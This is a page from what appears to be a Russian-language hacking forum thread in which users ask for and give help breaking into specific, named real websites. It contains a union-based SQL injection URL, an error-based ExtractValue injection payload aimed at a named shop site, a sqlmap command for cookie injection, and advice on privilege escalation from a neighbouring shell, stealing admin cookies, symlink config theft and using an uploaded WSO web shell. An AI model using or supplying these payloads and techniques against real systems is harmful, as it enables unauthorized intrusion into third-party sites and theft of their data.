Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    248
    Likes Received:
    11
    Reputations:
    1
    Ребят,посоветуйте в какую сторону копать,плз

    Ситуация такая:
    Жертва на DLE 9.x,админка доступна по адресу site.com/admin.php
    Есть шелл на соседе,с правами юзера соседа(попасть в папку "public_html" жертвы нет прав,нужны минимум права апача)
    Есть доступ к access логам жертвы.Судя по логам в админку он заходит редко,либо админит в основном через панель хостинга.
    В папке /tmp хранятся файлы сессий всех сайтов на сервере,но доступа к их содержимому нет(для входа в админку DLE нужно в куках передать переменную с пассом админа)

    Собственно,интересно узнать:
    1)возможно ли повысить права до апача? или есть другие способы пробраться в папку сайта жертвы?
    2)каким образом можно выудить куки админа?
    3)другие возможные векторы атак

    Help me,guys,please :rolleyes:
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    1) Зависит от ядра
    2) xss
    3) другие возможные векторы атак
     
    _________________________
  3. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    248
    Likes Received:
    11
    Reputations:
    1

    1) Uname: Linux 2.6.18-371.1.2.el5PAE #1 SMP Tue Oct 22 13:40:39 EDT 2013 i686
    Рут маловероятен,интересно подняться до апача.Возможно ли это вообще?
    2) С техникой эксплуатации ХСС мало знаком,но т.к. админ почти не заходит на сайт и версия ДЛЕ более-менее свежая(>9.5,паблик хсс под нее не встречал) - "кража" кук мне представляется невозможной
    Известна почта админа(которая находится на том же сервере,что и сайт) - возможно ли получить куки,отправив "специальное" письмо админу?
    3) Smooth
     
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    нашел на одном из сайтов _http://armydocs.ru/config.php , как это работает, сталкивался кто нибудь? :)
     
  5. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Да в общем-то ничего. Стандартный Symlink, который данные из конфигов с соседних сайтов.
     
  6. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    неполучается стянуть, или тут он не работает?)
     
  7. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Code:
    http://www..**********/pixsell/imageview.php?id=392751  union/*!select*/  (1),(2),(user()),(4),(5),(6),(7),(8),(9),(10),(11),(12)
     
    #23547 Inoms, 7 Sep 2014
    Last edited: 8 Sep 2014
    1 person likes this.
  8. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ребят подскажите как через wso шелл создать бд
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,440
    Likes Received:
    753
    Reputations:
    834
    во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!
     
    _________________________
  10. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    _http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    http://www.moysvet.ru/catalog/view/118876'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
    2 people like this.
  12. BuG_4F

    BuG_4F Member

    Joined:
    20 May 2008
    Messages:
    122
    Likes Received:
    67
    Reputations:
    5
    Помогите раскрутить скулю
     
  13. Inkognito2008

    Inkognito2008 New Member

    Joined:
    10 Sep 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Есть участок кода на чужом сайте:

    Code:
    <?php
    $data=file_get_contents("http://site.ru");
    echo $data;
    ?>
    Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.

    Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?


    .
     
    #23553 Inkognito2008, 10 Sep 2014
    Last edited: 10 Sep 2014
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,440
    Likes Received:
    753
    Reputations:
    834
    Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data;
    Ищи конфиги БД и пробуй подключиться!
     
    _________________________
  15. Inkognito2008

    Inkognito2008 New Member

    Joined:
    10 Sep 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Сайт без БД, то есть код выполнить никак нельзя?

    Если говорить точнее то вывод идет через:

    Code:
    $GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
    Вывод подхватывается JS и выводится на сайте.
     
    #23555 Inkognito2008, 10 Sep 2014
    Last edited: 10 Sep 2014
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,440
    Likes Received:
    753
    Reputations:
    834
    тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...
     
    _________________________
  17. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    78
    Likes Received:
    2
    Reputations:
    0
    Помогите составить запрос в sqlmap на sql inj cookie
    sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1
    верно? Он то показывает блинд , то нет
     
  18. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
     
    #23558 cyborgx, 10 Sep 2014
    Last edited: 10 Sep 2014
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    Помогите раскрутить :)

    HTML:
    http://www.svetodom.ru/brand/jhkhjkhjk
    http://www.svetodom.ru/brand/jhkhjkhjk+AND
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    а что сложного использовать error-based?
    например ExtractValue

     
    _________________________
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.